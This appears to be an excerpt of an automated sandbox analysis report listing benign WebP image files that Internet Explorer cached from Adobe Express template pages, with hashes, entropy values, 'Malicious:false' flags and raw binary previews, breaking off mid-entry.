                                                                                                                                                                                                                                                        SHA-512:7428100633CDA634D47A36EC95716C14FBF26F7D89B09EFA891055278A3D65AF8E2D75AEFD29019DAA76AB357084F34D4A10C99C4F122EA8304B5C82D9247961
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/create/media_119fa8433c6810e9daf1b00f4e515aadaf1026dc6.jpeg?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFz...WEBPVP8 n...P6...*....>u:.I$.".#..(...cn.v...}....|...a.=..v.........7......=-}D.......@...H.....U'..{c.[.B.v...=..w..?P/_x..L..SZ..c@o.....k....5...V......{+{.F#..~.o|..(...n.....wr.HX=)\.......a...7+...a0|m...s..&c(...Vd>..lg..gJ..r..g.HLO.X..ZV3......j.*...w..E.1....r...s..@r.....+...2Ah`..-...\..Ci.7.>..~...c4.............h9.`?e...E..x.i.,R................|\...o&.~..J.61...P...8......EY.3.4....J..S...e..K.....5...V............l%... .'anm.,A....s..}.'K..o":.x.[.&?.@_o.....A..y#.......`..;.0.....@n17.......=.....hw.z.;.t~4.Q./Q=.~....zK~f.FMLf.......^.o.{.r.. .....r..9OF.X%..[.....\.J.o.gN......S\[.`c.....b.l...[i.6A.lz[R2\.Z..M....r.5...B.........x... .a..,&[w...q..Cwy..].@...J!....%...!.m.iB....3...}.g...Vq.~....=...6.ur;........L..l.S.f.,.2.Z.......n.Z*).2...x.....,W.Q...T..+.B.Y.R.a]..*...8..r.X....B.v/q..CX.....l..f........1..+..E?....F........{,R.n...#f ..?.(..glO*.rp....d.........U....aQYM.(...U....{....P......M
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_11fb5a668e752872011b30935a3239bbf547aa4f3[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):12846
                                                                                                                                                                                                                                                        Entropy (8bit):7.985630959660311
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:n38akWxqumGaBcFGvZY9RhmpfN+RndWuL79:n38akW6NBc5tmxN+1guLJ
                                                                                                                                                                                                                                                        MD5:0A848608D2AA16292D8F563D9EB1D6A4
                                                                                                                                                                                                                                                        SHA1:0F11B1570805475D979C414322EF068D2B663584
                                                                                                                                                                                                                                                        SHA-256:37B682FF0028C4BBF5D3FD717359DE7F87E0A019867445B4DB398EBDEF4CBFE7
                                                                                                                                                                                                                                                        SHA-512:ADC1F61B4522A6472361BD5729E24890C2805FE186EB9179579FB846505D969AAA077D42056BDD2430B2E74F639A50EB61E41282E1CAFD7C1A2AD00EE8E91915
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_11fb5a668e752872011b30935a3239bbf547aa4f3.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF&2..WEBPVP8 .2.......*,...>u2.H$..!%. ...gn.....9.j.q.)_y.+.U................M].?.?..:.S.?..v...m...................7.?..;.[.S.....'._...zt~...I~......c.W.....|e.....................c....K.....................~....Z....qb...-EHr...S.msNb.:..j..v.O?H*..?./r.>../8.a........f.\..@..3.M.......A........[gP..G...g..6...4..?.....1 :. ,..n&.....s.B._.'..sf.I....[~.........H..c.>l.[A...Sde.,..K..q..|6]ZX.hi..D@.X~.k*E....Dl...@pd\....M.?../k.QR.H".....?........h............X.o..f.P...}..'...1 G%.......!.].*...G|@...U...J.l.3..0@Zq.4...^..K.......=..&4&....v..EM"i..|...1.Fl...=....@...@...]I.Qj1..ZS..&. ..\T.....z....w.M...._C.I.uC<.h$.;/.qW.c'.x...|2.7.pX.s.=....![.#.9.9....nJ[..<.............*....s.#.Wtq.V&M..:1..n0....K..D...P.7.c.4.0.=..$.<...:..}...H...I.{p.v[..8Tf.|@y..(...KAmu.~[. .w..$.y......r..Uq....}..%.gN....o..G$...d2'<3R.x...GL...`m... k.=5....#..^..[....Y...:O..].Z..>nw.... .... ...7.F.o..`....#UvpW..}.Z.......#a.:...GO..Jk.Oz.J8.z....j).
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_124e34d3819ffeb81b5d7792530ea9a99961b1948[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):11192
                                                                                                                                                                                                                                                        Entropy (8bit):7.981805427063665
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:LdKp2W9606CMmRJCgF8Vu7mTAZzTTQuGH1rT8dC/PVbwA4bEKAO0DNFb:8pI06Cd7amHxTTQuS3/Pl+bEKAO0DNF
                                                                                                                                                                                                                                                        MD5:1052D0B4FE4E3D6A976E0C0D866DA0F0
                                                                                                                                                                                                                                                        SHA1:1C141848060AEC58146088BE62CB390B94B84A01
                                                                                                                                                                                                                                                        SHA-256:98DB8F4F2D6892EBBF1B22663E02F4BADC8882CE22D361C057BF0456AB7112D1
                                                                                                                                                                                                                                                        SHA-512:58845C78647D57984710FF361224093C480E03081E80F64658081541D4ACC98A32F4D24A94C9D911500C33D120B56D69B0510B18072303C5E4F17E4C3BEC6420
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_124e34d3819ffeb81b5d7792530ea9a99961b1948.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.+..WEBPVP8 .+......*..k.>u6.H$."!&s.p...en.O8l.@../...s^".c....f...w..0.0~...y......O...[.q.%.5....&#.......?._=.xz....9_8e...J~o...?.u.)...S....?......7./...|..W...?b=.}t.../........g._..~..................o....._.?.?......j...O..;?U....~..t{............8^.6p-r..{m.N.=..^...Dv.......X.#.@Z1Q..(...N].Q>;nqW"D^.N.v.=.;....=,....3.L.....Y....R."...QP9.3j."..."._7...}......z...O!.<.9B.A6}..(N.....L.W.|..Z<....!.TR.nol%..c..S.k..K.h.....@.b..,.D...e.WF.0(2;.M.o.;N.J.M.]..9V$.o......&.V.?...4:1L..tj(...0A......l.E.cup....y!Z.......5.d:A.........D'./9.........5..rI..g8..#..B.,..@..E...*....v..{-......[....^..8m..Yo8....B#..gs.o..sQ....s.6=..,........'.`..............."......=.0..B../.{...^]\_..1.....$.......??.A.y.+..6.w..|....b.4..).RW..!...=.*Mw2...j...4...XuL..6o...Co.'..F;..f...xq;>...{W] XCP........|Z..6a.......wBd...v7.o2&.a...q.#A..S.....i>.8.. ...<....s..Fe.{.*]..".....K<.b.*Mc."..~.......X.kv.c..=.-u?...\._....4..D.Q.>/.imy#.z.33$.G.d**
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_12cf6ece47212fe7f4436d270c236898bfdff65ca[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16000
                                                                                                                                                                                                                                                        Entropy (8bit):7.987699396998844
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:6Ho4Bj2kyzY478jPRK6BiD1ZlnsoOSfLBD/Vg7/4gL2x:6IOjRKEiDzlnrtLBxg7D2x
                                                                                                                                                                                                                                                        MD5:F21D438E8534BEAACBE3A60B9ABEC0D6
                                                                                                                                                                                                                                                        SHA1:9BC71FB425CC40695397A7FE371FEB8AAA2C6AA9
                                                                                                                                                                                                                                                        SHA-256:98B20205EE4277896203FA482BDFFBE46178E03208D42A662F055AB79034CEA1
                                                                                                                                                                                                                                                        SHA-512:0EC39E74ACBB5F79F8CE15D1C8823211D44AE9F22758E4456D7A3BE9A72EEAFC7456AC5EC770E3B2C289739A3E0D41E75395AD36F668D976A25C82060930F8E4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: RIFF.A..WEBPVP8 .A.......*..k.>u2.G...!)u.....M....>>.....G...o2.S#..<',.z.G.......}..u.E.%.......w.o..=G..............._.................#.{.7..O.....^..........#.O.?.~C=.....o............O........'.......2.]..=.:g.o....}g.O.#.....}....'................O)/......{.........3..?....../.._..]....~........{....."y..OV".Q.h....v..7u.}.0...$..B\C8.K.h1..$.VP].p..a.x~.)0@..].n4....\....4./ j..=d.R....l... .T.a.e7....8d..Y....7C...%]..`.3<.u.......C.-Ny|.kY.]*.N6......W.d?X.oM..o.9...Px%.CeP....%$...A.Pj[....7..#<k.\.a...,5N:1...a.F.C(......i......J..........Cu.-....#5.Qd....Dj...V:..j5k.r1y.Ox..K[ .0.v....<..<j.....}[:......]....`3Nx..].....Gz%..Lf...'.;.ys..%..[l.q......P....6..Uo..U.....WJ..n .d.P.?..{.0.*.Z..pW"r.L._..D...'..C..Z...Pp|wB.....a.wA.....(P?...3.$...+..mv.=h.3..\.....U..*....00..j.......[;.(.Bd5.[.E..3A........TI..2p..ET.O..L.f..(.H..$h..).YL....U.......c..+..L.....9....p....X(.qz.?.##..u.G.\...o..w..<l8.*{.x....M8P..#.$R.:.l1".m:?2...Vx
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_12f25246ef43123b4685f4a829d1afba8e4a646b1[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9036
                                                                                                                                                                                                                                                        Entropy (8bit):7.979243285294048
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:bShJQ+GGsmNrAiBacmHkZrL+d/EvBTvEnBeXHNU5PD9S+UDagS+tKo7Qb/:eO0reNHk1qYpvkBeOD9Syd+tKo0b/
                                                                                                                                                                                                                                                        MD5:FDB7A0E70AD1278B121F752914FB73C3
                                                                                                                                                                                                                                                        SHA1:7DA23F1E586B1EA4B12418BA3730BF3B26240FD7
                                                                                                                                                                                                                                                        SHA-256:4F95CE6CDD0362E9C563F8F8739C82ED4FD08A909D43CD6583F44370EF94D56B
                                                                                                                                                                                                                                                        SHA-512:2D3E1B882D5BEF85604FE0A4166BD772BCDCD57D2FA2BCBF7E7866426EBD6F48C0777D6600E079EAC89C161E2B7020EF939E6736DFE96967CAA5DF35A40B934C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_12f25246ef43123b4685f4a829d1afba8e4a646b1.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFD#..WEBPVP8 8#......*..k.>u4.G.."!#.....en.s.._.......~.{..p.~......@.G._k...7.../.?u.'ug._..~..'...~..Q....P/.......l.>`.....u......?..}$...a..._.......#.{.....o.>s~........../..o......?j....jz......z.b.b..O....Z.....qA^..ZQ+..u......9.{`&.X.W...W.(Q.D._.`.Y.I9..N... ....T'.5_/!W681..z..)J;I.....`V=#.o.v.1...)EVZL...."#..<`pg..4.}6{....{..e....^..a..z._uF....p.W.k..=....{o^..=..[.@...@K G0..6O.W.1f2+\..+kO:...:...<.l;I......sRV>7......ZAU.{.......n.x.xYI........t|..].2R...O....f.w.@.G.8..../..t...V).\......t.4..dvo.G8......:....0L..TK....R...G.%.IPM"B_.E...:.".@..K.... ...&.LQ.^.uTa.$JZ..9q......o.S..x*.@U.|..n.2S...Qi.|T....2....L..?GE.K-P.m3.H.gH.b*h.^...r...L.,.A..83|.Y6.m`...........n....1X....zvr.@..~J...tJ..Sb.....I..T`.x...\...k........swSu\...c.... .,>f..k.6#=.6.b.?...,..D...H.....S@....;.."Nr..x..V..l.o...[0..=......q..p....V.........`.c.^.3...O....=M....|.bU.....]5YH.|. K....66.z.M...X.Cz..F...7g.H........|....o.19
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_13162a689b7729ba1d9ae15bb5bb07cde29392f4e[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):5570
                                                                                                                                                                                                                                                        Entropy (8bit):7.959712118600529
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:116o+9kJ2YOl6MHOEAt7C6doBzeBCGh406FL6Q4czLEvjovCp0ylmQEkbt6YtWZk:116o+9e2Yi6REAt7C/lVlFL6Q4czLSoC
                                                                                                                                                                                                                                                        MD5:FA02014DE3D97AA41DDA1E45C5477AD5
                                                                                                                                                                                                                                                        SHA1:D9EA00AD0DCE62508D0A932ECEB901A1B79110EB
                                                                                                                                                                                                                                                        SHA-256:095E1E76955CE2082BC565151D5B3FD144658B9F18F164A0B59E28CB5ED81A68
                                                                                                                                                                                                                                                        SHA-512:3DBAB5D2E553BE44951EF0F1F0CA0CFA5571EEA3D4B7370442820D98559264C983DEBD8EBD21574E6FF720973D12920E5C8BA126748075D72D72DFA6CE311F80
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_13162a689b7729ba1d9ae15bb5bb07cde29392f4e.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 ....0f...*..k.>u6.I$..!#.{H...in.`3P.e.......S.....+>....4K;{......~.<..Q.w..`/.....w.|............._..p....?.z.............z...+.;.?.....c.k.......[.......FDz=.5..#."..:.J...8..J..X..f..}0..6%..Q.....h..b.;..1hhi...:P.`I%.....H.GT,...".4....3..(v.........sJ_|.....7.|..`NF!...q(..z.t......$32..2.%......DL...Ne/f.yTr......l.',~.l9dR<.[:.o(q.]?~.'dZc|"..);.....C.1..'.N@...|d]....j.......-].......k.u.....*.o,. 'p..M....X.|..LP..a..*.7.._w...;....<..gQ....I.j....&...6._Z..&mQ..Q=..z..f....=..JQ.@]..w..`...1....]9g...0LvD......Y..&wX...;;..Uj.9....Y.....i.wK.T.../....%.`5e...&..).Z'.E/..~...zr..0.!....+.t.%L.....0I..aY......=M%[d\...\.|.J_}..."\..5...`>.^..K.C0.."..f#..U.*....;MT.:.d.J~...I(d`.n.....{.....q\.SpYI....VT.m.yt.F.C...E*o...y.?3.dK.\xW@\..|..5..h~r....R....Z...R9V.....M.....G#.m...#..z.... .$0..>.!,.)....L=.7...|6.-.9.c7.Dd..BT....iu..,{.H....].*[.m.....X}...)...a..}.v].k....5..\..eH.e.XR....`i&...7....Pl.R
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_13f42f554dae61fb2c87c959ba3208317bb5507e0[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):11784
                                                                                                                                                                                                                                                        Entropy (8bit):7.9831602641192365
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:Qt+4/zDayc+lmbX0CqiTPZ6759stI2pTQX9TuTeHVt3OVZXFOLh+JPAA8WsBrfnK:sjfa9+yEC1y9D2CNKTeHVt+Vt4uoAqB2
                                                                                                                                                                                                                                                        MD5:16667B7A0A947BA132EE07695FBFE064
                                                                                                                                                                                                                                                        SHA1:2862AE32B7815D0EF1A59B6D5991618E3C62E74A
                                                                                                                                                                                                                                                        SHA-256:1145213435965C31D4B56341EF55D4B24BA935AC7647A3E5A2C3A41B9E75BCBA
                                                                                                                                                                                                                                                        SHA-512:74DCB02EA68CB39DBDB43F6E9121E7D019C5F89693489DC54BFD89AD846C81F5A4F642ADCFBBC5503EAF020AFEC2F54ADE1F6D3551BF65093D8E63ABB775C6EE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_13f42f554dae61fb2c87c959ba3208317bb5507e0.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 .-......*..k.>u4.G.."!'4.....en..7........3.....{|.v.......y.~.t........%.........]e..=F.f}:}.?........e...H..~......L.!./...v?...d..O....w.g...................?..vRl_.b}.}....O.....~..............?......W.k....i>....h.....w.......}e.....o._........x........F;D..t.."..Ox..v.Fc.\....c..~>..Q......A...`.f+U.Sc.r.. (..'.(..pR.[qX.,<.3L..dF"..3.:.DGI.~...9..|..L....._-...O+....tJZXs...7.`...~...v2.bp/~........X..0q.....Rd..bI(4.Ej.?G.....J.z4.6.>a.Y.p.]...Lg.Q+E.....lX.W\.q.)...R}..5C..I.]..0...D........22...w.........0d}..]....GF].+.#G.)"s......N#*..Q .I...Q].....u.S`b....&:....S.L.P....{.:/.@$b/>Ib.A_A8...Rj\\..a.P.K.XC..O(....|0...8..u..].....p..d.,A..p....^....E........KC4...S|....Z0J}..\x...n...n.%o.R.=I....TT.JX&.i..O.]:...;(......v.y..f...1............c.f.K?....>..wj.......}.....'.7.Ue|_....._%j.../....j.*.d+=+..Y...X..\..ok.b.>J ..*\s....!..r 0..l..u...X.g&.9.......>..O....n.X+...E./.*...~...t.....#~.2.c{EO.H..6*P.\2
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_14abffd21a7d6097f1e2ae3f31e97c67849e1d60a[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):11218
                                                                                                                                                                                                                                                        Entropy (8bit):7.97490613143463
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:96KNpnMzq/pA4zcXFBCr64AE/Dd7hZKtcSRIf+temQmYRHy5KgszDC/3AlH:9PBMzq/pTz0nCGQ/Dd7hZBZmqRS5KfJB
                                                                                                                                                                                                                                                        MD5:2678D0BB8ED0533BE22F7D0CA737042B
                                                                                                                                                                                                                                                        SHA1:D71AFFB93796AA39093DCAAFCCD2F460F25F4B69
                                                                                                                                                                                                                                                        SHA-256:8E98B9F3035D76189B158B585694058FEC1ACF935028BA2F321025D28A6A8129
                                                                                                                                                                                                                                                        SHA-512:F0197B16FBFDFD2A170FCBEFEB164CA0B2635193F53E25875D0CDAFF492E061313850635AA53E4D039EF477C3690DCDF9F3274366DD6DB2C5F5D829C0C9EF87E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/create/media_14abffd21a7d6097f1e2ae3f31e97c67849e1d60a.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.+..WEBPVP8X..............ALPH......@.i;..m.m.m.m.m.....~$.jTDL..._.-.._.<.c....3........-....b...r...~...x44....[v..x.1.0.9...^}..(.n`g@y@T.$.....k.............Y.Z..5...........D..7.xT.~`..!....p.Jt...$.....5...y....@.q.#...;8...b..K..........'3...%...`.K>...-]...W7..9;.g..o../.d..._.@.Q.j(..1MA.............oH..6I$@n../.l.H.......u$@g.y..h).... .H.."a=r...(*.......?....... .H..D.....~,9.C$.E....O...S......?...O..7.m2.P....~.>...9K.H R......?...O...S......?...O...S......?...-<CP.p..D...3..=,.#....h`..9L.$@q..(b.&..Y.@E.=...-z...x.[F..0.!..U.....>.q...6...MT.....ndp...w..G..S.W..!..bX.D.9.0....K.'..w...x.....y.sur...l(.].{..<.&R.P...6%.yh.l.".>..V% ....5....q..S.zv......y$.Rp....w.>.@..Wp&.@....(.@ .K.yI.y@T.0p.C.q@.g7.w...I.(F.@r.(n.....U.......U.MY...co./X.s.q...<8...VP8 .(..P....*....>.B.J%..!.1. ...M...j.(Qs...]........p.?.#.@.H5]..[...?......u.G.s......:.T?...z....+...K......?...........G.K...{.S...../.....?...?...u/.g._..........O....
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1634648ec8e96f938b7af9d04f6b33dd47639079d[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):13372
                                                                                                                                                                                                                                                        Entropy (8bit):7.984703496501977
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:0WVz7LnL/Ni3zkmU0iFEVOztyQdGMpXtu1zfC+rI24IYk96JZBtUjWlI:tVzvZi3wMmEVGdGY9DEb4IMTU5
                                                                                                                                                                                                                                                        MD5:0BFC76C835AC811DC2DA141D6B5A29A2
                                                                                                                                                                                                                                                        SHA1:CFDD383500A5A16B55D0277CA018D787ECB0C3E6
                                                                                                                                                                                                                                                        SHA-256:88FA63967AB0D4E7C9EDB61E5BAE0251F0B54CAA9BEDFAD1012358D3D705A577
                                                                                                                                                                                                                                                        SHA-512:56EC87F78A92CACFB745DD6471F9441059BD6A0250EDE511B6E5409732E214E2F0F81A791A52FA505CBFAA9E9C0A2F9EAF9E0157B47635200B277A584A0A6444
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1634648ec8e96f938b7af9d04f6b33dd47639079d.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF44..WEBPVP8 (4.......*..k.>u4.G.."!%.L`...cn.p.@..\....}.~.%%....d........O......A...z......w.....g....L.R.............-=.?..qt.._...;....e./..A{o...s.O.._.7......y.C./._."}..............j.......}.:W.....=..M.7.......~..C..._\..}....$.....C./...?s.../....._...?.~Y...Q...O.?..?.............mo...?r.....L....b..t..#*.?M...Ub..s.A.....b2....W.z.8K>8...&. .4....w#.1...~.f|/jI`d~Tv.=+<.[s..A.DMW..`i..*C.7.H..%.Y.&.....S..X...........Ls=/...q..W..D....,l.6..W...Z.m.....F..9.....i8...(pT..X..l[.c.K..L0.ZWRc....`........P.^..}.D...W....>....k0.....%h..["l.r.JZ....)..{...;.......3...-.d...!.L4.|C...c.........kF.+.....@<r_G..&.W...J8.3.PM..,...o.m.Qu.....=..<.]..}}..H.H......).'...lV..P.....*..'z.z...%.A'_.j1.....P..7k!...p.F.R..eh<......F.E....,..f_.=..'pv..&....~..&.[."7.cO..g$h...t.......fr(NE..Z...O.L.2.T.....j.K.).0.L.g.#...q.q.|.X..(k..=.l....'.......4...5..D..&|.'z.c.W....!.....I.S..2..V..<....2...3.R..|...H.h.".4R...BmAm....[._.Tt....$z...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1810494ba8a85a4e63330c695fed8f89b5fe7a539[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8000
                                                                                                                                                                                                                                                        Entropy (8bit):7.970149110521799
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:2GzhLJDf5n7KPRXLOHfuy1BYpDEoh6yRRb:ThLhDVD2fh6yRRb
                                                                                                                                                                                                                                                        MD5:ABC71D510C648ACC781FE763C67BAF38
                                                                                                                                                                                                                                                        SHA1:34F2428D1CA96B7B6B8C956C10D00EE28AC42DC4
                                                                                                                                                                                                                                                        SHA-256:A9410090BD0C03DF5DB7FED463F4AB0C821029E2A54CB8F5C454EA35F7361D58
                                                                                                                                                                                                                                                        SHA-512:C72CB5386213C613E8ED1F796373CF6DD5AE8E5D3ACAB05DAEAD3190E6967C69740357C46A5F97CDC4825BFAA0C3B9FD4DE869E0C72D127162EAD05C31417288
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1810494ba8a85a4e63330c695fed8f89b5fe7a539.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF8...WEBPVP8 ,........*,...>u8.I$."!#u.....gn.s..^.......[........!......#.......d../c?..f.../^x.G.w.?.....C.y.....~....|.........m.~a.....s.OD..............U..~.yW}..o.7.?.....~U|........?.?....A...{......so.o....$.|.y...9.......6..i.8..4...A..kk.'..=/.fI..^....h..M..!L.......6P...o9..#.j...o.o.E.~|Y..za.blo..K...m....~j!s..)R.nC..J....<.$.kk.'..+U.e.$B3..*....t.....kj."L..#d.v..]!.#...p.%^..6I.h6..z.`SM.9.#.!.<..8..._...(9p...3.nbcxh.l... ..f...".t>.6>C..$..Dic..2:D_............N...U.@.p......H...[...r.%...Q...Y.A.....&..s......z..f.........He..|tZ..E....3C..B..<A....................&..........;<...K.~O6a:2.6...z.6.Es..33333333 HCzJM....zHm.."ec..(..x........|b.._.|.... @Q.tA.O8,-...:e..)..d..$.V.(.B. E_...L...v.c..Mu>~..F:.>..U<.6u.r.H.q.?O..w,.)=..L..L.X..q.Hx.@.?.....s&.-. ...R.1.h...,G....Y.a.G.....0.\..9......Qm.zI,...C.....UH.s....`#`|...<.F..a....b:...MV4*....t/.X..7u]^...of.P.y......o..X.G..V....^..D.}._z..-..-J&....C.5....z..].
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_18213dc89b86cad2ba1ec4d4d422be8ddbeddff77[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10362
                                                                                                                                                                                                                                                        Entropy (8bit):7.981486280225858
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:qVu9zG+97Gbx7lcUdp7yEF5lVBNeSxwydKlCfpFpopm8T3/PFDx:Mu7G0Ud4ILCyRDE3
                                                                                                                                                                                                                                                        MD5:3EF437420507DDEA237643058194827A
                                                                                                                                                                                                                                                        SHA1:E6342ECD457C545BBEEF97D3D1EDEB743B60D295
                                                                                                                                                                                                                                                        SHA-256:42BF6CAA029E18AA42360773590164C56E9BFD52A1C0E7A178D64266CCC2DE6C
                                                                                                                                                                                                                                                        SHA-512:41C923B158476946D8B6B256B258B5CEAEDEE8B37C5CD23BB7D50497B136C5B1B4BBF4AB25E92B9240A4F078771F5FA43C1D42113E795079E8BA2479D0E7D004
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_18213dc89b86cad2ba1ec4d4d422be8ddbeddff77.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFr(..WEBPVP8 f(..0....*..k.>u4.H...!%3.....in....N../...Y...9.....U...w.&..$.._s.5.....;.G....1?..7...P_.?................_..~J.e|....^...........?.?.?..D...w............M.......o._....8.I......._k?........................S....._._.....B4h..L_....).1.L:.{f..Uk.#.Tt..Dq...! .Wn^b.|C...N...xe.=u._.}.h....Klk......g2.S^_.4Z....J.X.H.......H.*XR_...^...X.....D....x{.. ..3Y.'.@K........g^..L...."}-~...*8..S.K013.4...M..i,...(...._..&h.2]...i.9......%3.0W...S.....PU...7YnVP.Ig.....g].g.f...S^....oT.....b.Y.oUt......l.vP.,.7...`..t.M.F$q.Z...D4`.{.%.U...c.......K.|.CZ....`.3.....W....x.4..f../..R.>...L.jKh...?.,KYX....G-F.0.!:.....=OB.4]4...u.nWe.5.......\....6....q..<|,..?:......*e..BaF,{...gu.c.D4.&.b..<ERC....@'..l.m.u.05...;3+....lx.....S.."..8..c.....@..;...C..+....m.D...v.h....u..W...ip?-.L.#0.o:A....3...Q.....M..<.0.8..&..0.#.26+.O..8....'.[.s..}v.2E[7X.O.......b.ng..*./.X......C.w..r./:<..q5...;......2..9...j9......Tx.. .(*Ux..H-3..P.#.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1942b8dfa3fbbe527b5be1e94d82f53fbea6204dc[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):7660
                                                                                                                                                                                                                                                        Entropy (8bit):7.971413108439681
